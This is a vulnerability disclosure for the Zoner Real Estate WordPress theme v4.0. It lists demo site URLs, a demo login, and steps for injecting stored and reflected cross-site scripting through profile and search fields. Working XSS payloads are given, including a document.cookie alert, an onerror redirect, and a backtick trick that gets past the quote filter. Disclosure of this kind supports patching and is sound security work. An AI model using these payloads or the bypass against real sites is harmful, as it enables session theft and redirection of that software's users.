[*] :: Title: Zoner - Real Estate WordPress Theme v4.0 Reflected & Stored XSS Injections
[*] :: Author: QUIXSS
[*] :: Date: 2019-04-26
[*] :: Software: Zoner - Real Estate WordPress Theme v4.0
[?] :: Technical Details & Description:
# Weak security measures like bad input fields data filtering has been discovered in the «Zoner - Real Estate WordPress Theme». Current version of this WordPress Premium theme is 4.0.
[?] :: Demo Website:
# Frontend: https://zoner.fruitfulcode.com/home_v/1/
# Backend (user): https://zoner.fruitfulcode.com/sign-in/
# Login/Password (user): firstname.lastname@example.org/CvfWo(SY
[!] :: Special Note:
# 1.575 Sales
[!] :: For developers:
# Disabling any data changes on a demo websites doesn't make your applications more secure. It's good for business and sales but you are simply double-crossing your clients.
[+] :: PoC [Links]:
# https://zoner.fruitfulcode.com/home_v/1/ (needs authorization)
# https://zoner.fruitfulcode.com/author/quixss/?profile-page=my_profile (needs authorization)
# http://tiny.cc/quixss (Reflected XSS with cookie alert)
# http://tiny.cc/quixss2 (Reflected XSS with redirect)
[+] :: PoC [Stored XSS Injection]:
# Authorize on the demo website for tests as a regular user, then go to any page with a text field, f.e. https://zoner.fruitfulcode.com/author/quixss/?profile-page=my_profile
# Inside any text field type "> first just to «close» an input field, then use your payload, save the data and your code will be successfully injected. For any text box instead of "> use </textarea> first and then your payload.
# Sample payload #1: "><script>alert('QUIXSS')</script>
# Sample payload #2: "><img src="x" onerror="alert('QUIXSS');">
[+] :: PoC [Reflected XSS Injection]:
# Go to any page with the «Search Your Property» form, f.e. https://zoner.fruitfulcode.com/home_v/3/ and use your payload for Reflected XSS Injection inside the «Keyword» input field. Keep in mind that quotes will be filtered, but u can bypass it by using combination of ` quotes and «no quotes» (check the provided samples).
# Sample payload #1: "><img src="x" onerror="alert(document.cookie)">
# Sample payload #2: "><img src="x" onerror=window.location.replace(`https://twitter.com/quixss`)>